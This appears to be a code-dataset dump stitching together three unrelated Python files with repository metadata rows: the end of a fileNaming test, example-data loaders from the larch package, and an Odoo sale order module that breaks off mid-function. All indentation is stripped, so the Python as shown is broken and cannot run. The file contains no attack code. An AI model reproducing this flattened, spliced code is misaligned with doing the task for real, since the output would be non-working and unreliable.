["a(1)", "a(6)", "a", "a(2)", "a(3)", "a(4)", "a(5)", "a(7)",
"a(8)", "a(9)", "a(10)", "a(11)"]
],
[
["dd", "dd(1)", "dd(2)", "dd", "dd(1)", "dd(1)(2)", "dd(1)(1)",
"dd", "dd(1)"],
["dd", "dd(1)", "dd(2)", "dd(3)", "dd(1)(1)", "dd(1)(2)",
"dd(1)(1)(1)", "dd(4)", "dd(1)(3)"]
]
]
for t in tests:
res = fileNaming(t[0])
ans = t[1]
if ans == res:
print("PASSED: fileNaming({}) returned {}"
.format(t[0], res))
else:
print("FAILED: fileNaming({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
| mit | -816,034,966,986,424,000 | 26.054545 | 79 | 0.348118 | false |
jpn--/larch | larch/data_services/examples.py | 1 | 3855 | import os
import tables as tb
import pandas as pd
def MTC():
from larch.dataframes import DataFrames
from larch.data_warehouse import example_file
ca = pd.read_csv(example_file('MTCwork.csv.gz'), index_col=('casenum', 'altnum'))
ca['altnum'] = ca.index.get_level_values('altnum')
dt = DataFrames(
ca,
ch="chose",
crack=True,
alt_codes=[1, 2, 3, 4, 5, 6],
alt_names=['DA', 'SR2', 'SR3', 'TRANSIT', 'BIKE', 'WALK']
)
dt.data_ce_as_ca("_avail_")
return dt
# from .service import DataService
# from .h5 import H5PodCA, H5PodCO
# warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'MTCwork.h5d')
# f = tb.open_file(warehouse_file, mode='r')
# idca = H5PodCA(f.root.larch.idca)
# idco = H5PodCO(f.root.larch.idco)
# return DataService(pods=[idca,idco], altids=[1,2,3,4,5,6], altnames=['DA','SR2','SR3','TRANSIT','BIKE','WALK'])
def EXAMPVILLE(model=None):
from ..util import Dict
evil = Dict()
from .service import DataService
import numpy
from .h5 import H5PodCA, H5PodCO, H5PodRC, H5PodCS
from ..omx import OMX
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
evil.skims = OMX(os.path.join(warehouse_dir,'exampville.omx'), mode='r')
evil.tours = H5PodCO(os.path.join(warehouse_dir,'exampville_tours.h5'), mode='r', ident='tours')
# hhs = H5PodCO(os.path.join(warehouse_dir,'exampville_hh.h5'))
# persons = H5PodCO(os.path.join(warehouse_dir,'exampville_person.h5'))
# tours.merge_external_data(hhs, 'HHID', )
# tours.merge_external_data(persons, 'PERSONID', )
# tours.add_expression("HOMETAZi", "HOMETAZ-1", dtype=int)
# tours.add_expression("DTAZi", "DTAZ-1", dtype=int)
evil.skims_rc = H5PodRC(evil.tours.HOMETAZi[:], evil.tours.DTAZi[:], groupnode=evil.skims.data, ident='skims_rc')
evil.tours_stack = H5PodCS([evil.tours, evil.skims_rc], storage=evil.tours, ident='tours_stack_by_mode').set_alts([1,2,3,4,5])
DA = 1
SR = 2
Walk = 3
Bike = 4
Transit = 5
# tours_stack.set_bunch('choices', {
# DA: 'TOURMODE==1',
# SR: 'TOURMODE==2',
# Walk: 'TOURMODE==3',
# Bike: 'TOURMODE==4',
# Transit: 'TOURMODE==5',
# })
#
# tours_stack.set_bunch('availability', {
# DA: '(AGE>=16)',
# SR: '1',
# Walk: 'DIST<=3',
# Bike: 'DIST<=15',
# Transit: 'RAIL_TIME>0',
# })
evil.mode_ids = [DA, SR, Walk, Bike, Transit]
evil.mode_names = ['DA', 'SR', 'Walk', 'Bike', 'Transit']
nZones = 15
evil.dest_ids = numpy.arange(1,nZones+1)
evil.logsums = H5PodCA(os.path.join(warehouse_dir,'exampville_mc_logsums.h5'), mode='r', ident='logsums')
return evil
def SWISSMETRO():
from ..util.temporaryfile import TemporaryGzipInflation
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
from .service import DataService
from .h5 import H5PodCO, H5PodCS
warehouse_file = TemporaryGzipInflation(os.path.join(warehouse_dir, "swissmetro.h5.gz"))
f = tb.open_file(warehouse_file, mode='r')
idco = H5PodCO(f.root.larch.idco)
stack = H5PodCS(
[idco], ident='stack_by_mode', alts=[1,2,3],
traveltime={1: "TRAIN_TT", 2: "SM_TT", 3: "CAR_TT"},
cost={1: "TRAIN_CO*(GA==0)", 2: "SM_CO*(GA==0)", 3: "CAR_CO"},
avail={1:'TRAIN_AV*(SP!=0)', 2:'SM_AV', 3:'CAR_AV*(SP!=0)'},
choice={1: "CHOICE==1", 2: "CHOICE==2", 3: "CHOICE==3"},
)
return DataService(pods=[idco, stack], altids=[1,2,3], altnames=['Train', 'SM', 'Car'])
def ITINERARY_RAW():
warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'itinerary_data.csv.gz')
import pandas
return pandas.read_csv(warehouse_file)
def example_file(filename):
warehouse_file = os.path.normpath( os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', filename) )
if os.path.exists(warehouse_file):
return warehouse_file
raise FileNotFoundError(f"there is no example data file '{warehouse_file}' in data_warehouse")
| gpl-3.0 | 2,696,184,256,727,657,500 | 37.168317 | 127 | 0.659663 | false |
trabacus-softapps/docker-magicecommerce | additional_addons/magicemart/m8_sale.py | 1 | 45772 | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from datetime import datetime, timedelta
import time
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
import amount_to_text_softapps
from lxml import etree
from openerp.osv.orm import setup_modifiers
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
class sale_order(osv.osv):
_inherit = 'sale.order'
# Many2one Arrow button should not come for Customer Portal User and Manager
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
user = self.pool.get('res.users').browse(cr,uid,uid)
if context is None:
context = {}
res = super(sale_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
doc = etree.XML(res['arch'])
cr.execute("""select uid from res_groups_users_rel where gid in
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name in ('User','Manager')) and uid = """+str(uid))
portal_user = cr.fetchone()
if portal_user:
if ('fields' in res) and (res['fields'].get('order_line'))\
and (res['fields']['order_line'].get('views'))\
and (res['fields']['order_line']['views'].get('tree'))\
and (res['fields']['order_line']['views']['tree'].get('arch')):
# doc = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
# print 'doc',res['fields']['order_line']['views']['tree']['arch']
doc1 = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
for node in doc1.xpath("//field[@name='price_unit']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
for node in doc1.xpath("//field[@name='tax_id']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
#
# if portal_user:
if view_type == 'form':
domain = "[('id','child_of',"+str(user.partner_id.id)+")]"
for node in doc.xpath("//field[@name='pricelist_id']"):
node.set('options', '{"no_open":True}')
node.set('readonly','1')
setup_modifiers(node,res['fields']['pricelist_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_id']"):
node.set('options', "{'no_open' : true}")
node.set('options', "{'no_create' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='contact_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['contact_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_invoice_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_invoice_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_shipping_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_shipping_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='warehouse_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['warehouse_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='payment_term']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['payment_term'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='date_order']"):
node.set('readonly', "1")
setup_modifiers(node, res['fields']['date_order'])
res['arch'] = etree.tostring(doc)
return res
def _get_default_warehouse(self, cr, uid, context=None):
if not context:
context = {}
company_id = self.pool.get('res.users')._get_company(cr, context.get('uid',uid), context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def default_get(self, cr, uid, fields, context=None):
res = super(sale_order,self).default_get(cr, uid, fields, context)
user = self.pool.get('res.users').browse(cr, uid, uid)
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
res['partner_id'] = user.partner_id.id
res.update({'order_policy': 'picking'})
return res
def _get_portal(self, cr, uid, ids, fields, args, context=None):
res = {}
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
for case in self.browse(cr, uid, ids):
res[case.id] = {'lock_it': False}
lock_flag = False
if case.state not in ('sent', 'draft'):
lock_flag = True
if uid == portal_group:
if case.state in ('sent', 'draft') and case.sent_portal:
lock_flag = True
res[case.id]= lock_flag
return res
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
# Overriden Discount is not considering in tax(Removing Discount in this function)
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit, line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = round(res[order.id]['amount_untaxed'] + res[order.id]['amount_tax'])
return res
# Funtion To Convert Amount to Text
def _amt_in_words(self, cr, uid, ids, field_name, args, context=None):
res={}
for case in self.browse(cr, uid, ids):
txt=''
if case.amount_total:
txt += amount_to_text_softapps._100000000_to_text(int(round(case.amount_total)))
res[case.id] = txt
return res
_columns ={
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'contact_id' : fields.many2one('res.partner','Contact Person'),
#inherited
'amount_untaxed': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The total amount."),
'amt_in_words' : fields.function(_amt_in_words, method=True, string="Amount in Words", type="text",
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
help="Amount in Words.", track_visibility='always'),
'date_from' : fields.function(lambda *a,**k:{}, method=True, type='date',string="From"),
'date_to' : fields.function(lambda *a,**k:{}, method=True, type='date',string="To"),
'terms' : fields.text("Terms And Condition"),
'lock_it' : fields.function(_get_portal, type='boolean', string='Lock it'),
'sent_portal' : fields.boolean('Qtn Sent by Portal'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
# Overriden for old Records
# 'name': fields.char('Order Reference', required=True, copy=False,
# readonly=False, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
#
# 'do_name' : fields.char("Delivery Order No", size=25),
}
_defaults = {
'order_policy': 'picking',
'sent_portal': False,
'warehouse_id':_get_default_warehouse
}
# Duplicate Function.
def reorder(self, cr, uid, ids, context=None):
context = context or {}
print "YES"
res = self.copy(cr, uid, ids[0], {}, context)
view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
view_id = view_ref and view_ref[1] or False,
return {
'type': 'ir.actions.act_window',
'name': _('Sales Order'),
'res_model': 'sale.order',
'res_id': res,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
stock_obj = self.pool.get("stock.picking.out")
invoice_vals = super(sale_order,self)._prepare_invoice(cr, uid, order, lines, context)
pick_ids = stock_obj.search(cr, uid,[('sale_id','=',order.id)])
for pick in stock_obj.browse(cr, uid, pick_ids):
invoice_vals.update({
'transport' : pick.cust_po_ref or '',
'vehicle' : pick.vehicle or '',
'dc_ref' : pick.name or '',
})
return invoice_vals
# On select of customer pop up contact person
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
partner_vals = super(sale_order,self).onchange_partner_id(cr, uid, ids, part, context=context)
if part:
partner = partner_obj.browse(cr, uid, part)
cont = partner_obj.search(cr, uid, [('parent_id','=',part)], limit=1)
partner_vals['value'].update({
'contact_id' : cont and cont[0] or False,
'pricelist_id': partner.property_product_pricelist.id
})
return partner_vals
def _prepare_order_picking(self, cr, uid, order, context=None):
res = super(sale_order,self)._prepare_order_picking(cr, uid, order, context)
res.update({
'contact_id' : order.contact_id and order.contact_id.id or False
})
return res
def quotation(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
datas = {
'model': 'sale.order',
'ids': ids,
'form': self.read(cr, uid, ids[0], context=context),
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'Sales Quotation',
'name' : case.name and 'Sales Quotation - ' + case.name or 'Sales Quotation',
'datas': datas,
'nodestroy': True
}
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'magicemart', 'email_template_send_quotation')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
else:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
def create(self, cr, uid, vals, context = None):
print "sale",uid, context.get("uid")
print "Sale COntext",context
if not context:
context = {}
print "Create Wbsite Sale Order......",vals
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
uid = context.get("uid",uid)
team_id = vals.get('team_id',False)
if team_id !=3:
if vals.get('warehouse_id',False):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id'))
#to select sub company shop
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale warehouse !'))
partner_id = vals.get('partner_id',False)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).create(cr, uid, vals, context = context)
def write(self, cr, uid, ids, vals, context = None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
warehouse_obj = self.pool.get('stock.warehouse')
if isinstance(ids, (int, long)):
ids = [ids]
if not ids:
return []
case = self.browse(cr, uid, ids[0])
if uid != 1:
if vals.get('warehouse_id',case.warehouse_id.id):
warehouse = warehouse_obj.browse(cr, uid, vals.get('warehouse_id',case.warehouse_id.id))
if not warehouse.company_id.parent_id:
raise osv.except_osv(_('User Error'), _('You must select sub company sale Warehouse !'))
if vals.get('partner_id', case.partner_id):
partner_id = vals.get('partner_id', case.partner_id.id)
partner = partner_obj.browse(cr, uid, partner_id)
vals.update({
# 'pricelist_id':partner.property_product_pricelist.id,
'company_id':warehouse.company_id.id,
})
return super(sale_order, self).write(cr, uid, ids, vals, context = context)
#inherited
def action_button_confirm(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
for ln in case.order_line:
for t in ln.tax_id:
if t.company_id.id != case.company_id.id :
raise osv.except_osv(_('Configuration Error!'),_('Please define the taxes which is related to the company \n "%s" !')%(case.company_id.name))
return super(sale_order,self).action_button_confirm(cr, uid, ids, context)
# Inheriting action_ship_create Method to update Sale ID in Delivery Order
def action_ship_create(self, cr, uid, ids, context=None):
if not context:
context={}
pick_ids=[]
# context.get('active_ids').sort()
res=super(sale_order, self).action_ship_create(cr, uid, ids,context)
pick=self.pool.get('stock.picking')
for case in self.browse(cr,uid,ids):
pick_ids=pick.search(cr,uid,[('group_id','=',case.procurement_group_id.id)])
pick.write(cr,uid,pick_ids,{
'sale_id' : case.id,
'company_id' : case.company_id.id,
})
return res
#
# def web_comp_tax(self,cr, uid, ids, warehouse_id, company_id, context=None):
# context = dict(context or {})
# print "Wrehouse Sale.........",warehouse_id
# if warehouse_id:
# self.write(cr, uid, ids, {"warehouse_id":warehouse_id,
# 'company_id':company_id,
# })
# return True
sale_order()
class sale_order_line(osv.osv):
_name = 'sale.order.line'
_inherit = 'sale.order.line'
_description = 'Sales Order Line'
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.price_subtotal / line.product_uom_qty
return res
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = {'price_total':0.0,'price_subtotal':0.0}
price = line.price_unit #* (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
# print "Taxes......", taxes
cur = line.order_id.pricelist_id.currency_id
res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])
# for price total
amount = taxes['total']
for t in taxes.get('taxes',False):
amount += t['amount']
res[line.id]['price_total'] = cur_obj.round(cr, uid, cur, amount)
return res
# Overriden, to remove the discount calculation(coz, discount is already considered in unit price.)
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty ) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'price_total' : fields.function(_amount_line, string='Subtotal1', digits_compute= dp.get_precision('Account'), store=True, multi="all"),
'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute= dp.get_precision('Account'), multi="all",store=True),
'reference' : fields.char("Reference(BOP)", size=20),
# 'mrp' : fields.related('product_id','list_price', type="float", string="MRP", store=True),
# 'available_qty' : fields.related('product_id','qty_available', type="float", string="Available Quantity", store=True ),
'product_image' : fields.binary('Image'),
'sale_mrp' : fields.float('MRP', digits=(16,2)),
'available_qty' : fields.integer("Available Quantity"),
# Overriden,to remove the discount calculation(coz, discount is already considered in unit price.)
'margin': fields.function(_product_margin, string='Margin',
store = True),
'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
}
_order = 'id asc'
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
res = super(sale_order_line,self)._prepare_order_line_invoice_line(cr, uid, line, account_id, context=context)
if res:
res.update({'reference': line.reference})
return res
# Overriden
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
context = context or {}
part_obj = self.pool.get("res.partner")
if context.get("uid"):
if context and uid != context.get("uid",False):
uid = context.get("uid")
user_obj = self.pool.get("res.users")
user = user_obj.browse(cr, uid, [context.get("uid",uid)])
partner = part_obj.browse(cr, uid, [user.partner_id.id])
partner_id = partner.id
lang = lang or context.get('lang', False)
if not partner_id:
raise osv.except_osv(_('No Customer Defined!'), _('Before choosing a product,\n select a customer in the sales form.'))
warning = False
product_uom_obj = self.pool.get('product.uom')
partner_obj = self.pool.get('res.partner')
product_obj = self.pool.get('product.product')
context = {'lang': lang, 'partner_id': partner_id}
partner = partner_obj.browse(cr, uid, partner_id)
lang = partner.lang
# lang = context.get("lang",False)
context_partner = {'lang': lang, 'partner_id': partner_id}
if not product:
return {'value': {'th_weight': 0,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
warning_msgs = ''
product_obj = product_obj.browse(cr, uid, product, context=context_partner)
uom2 = False
if uom:
uom2 = product_uom_obj.browse(cr, uid, uom)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = product_uom_obj.browse(cr, uid, uos)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner.property_account_position or False
else:
fpos = self.pool.get('account.fiscal.position').browse(cr, uid, fiscal_position)
if update_tax: #The quantity only have changed
result['tax_id'] = self.pool.get('account.fiscal.position').map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = self.pool.get('product.product').name_get(cr, uid, [product_obj.id], context=context_partner)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = product_uom_obj._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
result['th_weight'] = q * product_obj.weight # Round the quantity up
if not uom2:
uom2 = product_obj.uom_id
# get unit price
if not pricelist:
warn_msg = _('You have to select a pricelist or a customer in the sales form !\n'
'Please set one before choosing a product.')
warning_msgs += _("No Pricelist ! : ") + warn_msg +"\n\n"
else:
price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
if price is False:
warn_msg = _("Cannot find a pricelist line matching this product and quantity.\n"
"You have to change either the product, the quantity or the pricelist.")
warning_msgs += _("No valid pricelist line found ! :") + warn_msg +"\n\n"
else:
result.update({'price_unit': price})
if warning_msgs:
warning = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
return {'value': result, 'domain': domain, 'warning': warning}
#inherited
def product_id_change_with_wh(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, warehouse_id=False, context=None):
if not context:
context= {}
context = dict(context)
case = self.browse(cr, uid, ids)
uom = case.product_uom and case.product_uom.id or False
res = super(sale_order_line,self).product_id_change_with_wh(cr, uid, ids, pricelist, product, qty, uom, qty_uos, uos, name, partner_id, lang, update_tax, date_order, packaging, fiscal_position, flag, warehouse_id,context)
#if the product changes and product not in price_list then it will take the sale price
location_ids =[]
unit_amt = 0.00
move_obj = self.pool.get("stock.move")
loc_obj = self.pool.get("stock.location")
prod_obj =self.pool.get("product.product")
prod = prod_obj.browse(cr, uid,product)
pricelist_obj = self.pool.get("product.pricelist")
warehouse_obj = self.pool.get("stock.warehouse")
pricelist_id = pricelist_obj.browse(cr, uid, pricelist)
if warehouse_id: # shop is nothing but company_id
context.update({'warehouse':warehouse_id})
warehouse = warehouse_obj.browse(cr, uid, warehouse_id)
res['value']['company_id'] = warehouse.company_id.id
# warehouse_id = context.get('warehouse_id')
# warehouse = self.pool.get("stock.warehouse").browse(cr, uid, warehouse_id)
# comp_id = warehouse.company_id.id
# location_ids = loc_obj.search(cr, uid,[('company_id','=',comp_id ),('name','=','Stock')])
# if location_ids:
# location_ids = location_ids[0]
if product:
available_qty = prod_obj._product_available(cr, uid, [product], None, False, context)
available_qty = available_qty[product].get('qty_available',0)
# Commented for Pricelist Concept
if pricelist_id.name == 'Public Pricelist' or not res['value'].get('price_unit'):
unit_amt = prod.discount and prod.list_price - ((prod.discount/100) * prod.list_price) or prod.list_price
res['value']['discount'] = prod.discount
if not res['value'].get('price_unit') and product:
res['value']['price_unit'] = unit_amt and unit_amt or prod.list_price
warn_msg = _('No Product in The Current Pricelist, It Will Pick The Sales Price')
warning_msgs = _("No Pricelist ! : ") + warn_msg +"\n\n"\
res['warning'] = {
'title': _('Configuration Error!'),
'message' : warning_msgs
}
if product:
res['value']['sale_mrp'] = prod.list_price
res['value']['product_image'] = prod.image_medium
res['value']['available_qty'] = available_qty
res['value']['purchase_price'] = prod.standard_price or 0.00
# Commented for Pricelist Concept
if unit_amt :
res['value']['price_unit'] = unit_amt
return res
def create(self, cr, uid, vals, context=None):
if not context:
context = {}
if context.get("uid"):
if uid != context.get("uid",False):
uid = context.get("uid")
context = dict(context)
uom_obj = self.pool.get("product.uom")
loc_obj = self.pool.get("stock.location")
move_obj = self.pool.get("stock.move")
sale_obj = self.pool.get("sale.order")
prod_obj = self.pool.get("product.product")
tax_obj = self.pool.get("account.tax")
order_id = vals.get('order_id')
case = sale_obj.browse(cr, uid,order_id )
company_id = case.warehouse_id.company_id.id
res = self.product_id_change_with_wh(cr, uid, [], case.pricelist_id.id,vals.get('product_id',False),vals.get('qty',0), vals.get('uom',False), vals.get('qty_uos',0),
vals.get('uos',False), vals.get('name',''), case.partner_id.id, vals.get('lang',False), vals.get('update_tax',True), vals.get('date_order',False),
vals.get('packaging',False), vals.get('fiscal_position',False), vals.get('flag',False),warehouse_id=case.warehouse_id.id,context=context)['value']
prod_uom = case.product_id.uom_id.id
line_uom = vals.get('product_uom')
# For Case of UOM
if prod_uom != line_uom:
